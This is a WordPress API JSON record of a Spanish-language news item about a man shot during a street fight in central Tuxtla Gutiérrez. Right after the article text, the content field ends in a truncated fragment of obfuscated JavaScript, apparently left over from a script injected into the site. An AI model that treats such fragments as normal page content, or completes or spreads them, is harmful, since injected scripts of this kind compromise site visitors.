{"id":8885,"date":"2023-03-03T03:06:26","date_gmt":"2023-03-03T03:06:26","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8885"},"modified":"2023-03-03T03:06:27","modified_gmt":"2023-03-03T03:06:27","slug":"balean-a-hombre-en-el-centro-de-tuxtla-gutierrez","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8885","title":{"rendered":"Balean a hombre en el centro de Tuxtla Guti\u00e9rrez"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"540\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/FB_IMG_1677812662316.jpg\" alt=\"\" class=\"wp-image-8886\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/FB_IMG_1677812662316.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/FB_IMG_1677812662316-300x225.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 2 de marzo del 2023. Tuxtla Guti\u00e9rrez.- Este jueves por la madrugada un hombre fue baleado en calles del Barrio San Pascualito, en el centro de Tuxtla Guti\u00e9rrez.De acuerdo con los reportes oficiales, este hecho ocurri\u00f3 cuando Carlos &#8220;N&#8221; de 25 a\u00f1os de edad se l\u00edo a golpes con otro masculino que se encontraba en estado de ebriedad, sobre la S\u00e9ptima Poniente y Primera Sur.En la gresca, su vecino sac\u00f3 un arma de fuego y le dispar\u00f3 en tres ocasiones.Los vecinos del lugar llamaron a los n\u00fameros de emergencias, por lo que, fue atendido por param\u00e9dicos de la Cruz Roja y trasladado a un nosocomio para su atenci\u00f3n m\u00e9dica especializada.Sobre el agresor, \u00fanicamente se sabe que escap\u00f3 rumbo a la zona Poniente de la ciudad.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 2 de marzo del 2023. Tuxtla Guti\u00e9rrez.- Este jueves por la madrugada un hombre fue baleado en calles del Barrio San Pascualito, en el centro de Tuxtla Guti\u00e9rrez.De acuerdo con los reportes oficiales, este hecho ocurri\u00f3 cuando Carlos &#8220;N&#8221; de 25 a\u00f1os de edad se l\u00edo a golpes con otro masculino que &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8886,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-8885","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8885","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8885"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8885\/revisions"}],"predecessor-version":[{"id":8887,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8885\/revisions\/8887"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8886"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8885"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8885"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8885"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}